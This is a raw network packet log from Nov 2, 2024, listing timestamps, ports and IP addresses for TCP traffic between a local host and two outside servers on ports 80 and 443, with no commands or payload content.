                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693542957 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693553925 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693566084 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693577051 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693602085 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693664074 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693676949 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693710089 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693711996 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693725109 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693742990 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693769932 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693800926 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693811893 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693824053 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693840981 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693841934 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693849087 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693850994 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693864107 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693866014 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693886042 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693886995 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693897009 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693907976 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693909883 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693928957 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693929911 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693958044 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693958044 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693970919 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693984985 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693990946 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694003105 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694010019 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694015026 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694025993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694046974 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694057941 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694068909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694073915 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694089890 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694097042 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694108009 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694117069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694118023 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694133043 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694164038 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694197893 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694209099 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694219112 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694245100 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694271088 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694279909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694289923 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694328070 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694341898 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694354057 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694364071 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694384098 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694399118 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694411039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694411993 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694423914 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694431067 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694442987 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694468975 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694474936 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694488049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694498062 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694510937 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694521904 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694525957 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694546938 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694561005 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694632053 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.694672108 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.695663929 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.695705891 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.729234934 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.729413033 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.729470968 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.729511976 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.729530096 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.729543924 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.729551077 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.734509945 CET63830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.734592915 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.734692097 CET63830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.734831095 CET63830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.734853983 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.740278959 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.740303040 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.740343094 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.740361929 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.740396023 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.752585888 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.752585888 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.752628088 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.752651930 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.755357027 CET63831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.755424023 CET4436383113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.755511999 CET63831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.755702972 CET63831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.755738020 CET4436383113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763145924 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763165951 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763175011 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763184071 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763195038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763197899 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763200045 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763211966 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763221025 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763233900 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763242960 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763254881 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763281107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763290882 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763298035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763307095 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763319969 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763323069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763334990 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763345957 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763353109 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763379097 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763698101 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763710976 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763719082 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763730049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763737917 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763746977 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763747931 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763758898 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763760090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763777018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763786077 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763789892 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763797998 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763819933 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763838053 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763850927 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763861895 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763876915 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.763894081 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764019012 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764029026 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764034986 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764045000 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764055014 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764062881 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764077902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764111042 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764183998 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764195919 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764205933 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764215946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764224052 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764228106 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764234066 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764240026 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764251947 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764259100 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764262915 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764276028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764285088 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764307976 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764333010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764334917 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764349937 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764362097 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764372110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764372110 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764379025 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764384985 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764395952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764400959 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764409065 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764410973 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764448881 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764488935 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764504910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764508963 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764517069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764529943 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764537096 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764544010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764554977 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764559984 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764566898 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764576912 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764579058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764600992 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764627934 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764642954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764708996 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764833927 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764844894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.764888048 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765017986 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765028954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765038967 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765049934 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765057087 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765060902 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765070915 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765084028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765084028 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765095949 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765103102 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765106916 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765117884 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765141964 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765167952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765180111 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765208006 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765345097 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765357018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765367985 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765377045 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765378952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765392065 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765400887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765403986 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765433073 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765492916 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765506029 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765516043 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765522003 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765528917 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765552044 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.765575886 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.808229923 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.808410883 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.808485985 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.808651924 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.808665037 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.808679104 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.808685064 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.810789108 CET63832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.810818911 CET4436383213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.810909986 CET63832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811018944 CET63832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811031103 CET4436383213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811060905 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811072111 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811081886 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811115026 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811139107 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811161041 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811528921 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811537981 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811547995 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811558008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811578035 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811598063 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811655045 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811682940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811693907 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811701059 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811727047 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811728954 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811738014 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811743021 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811763048 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811772108 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811945915 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811959028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811970949 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811983109 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811988115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.811995029 CET8063819185.215.113.16192.168.2.4
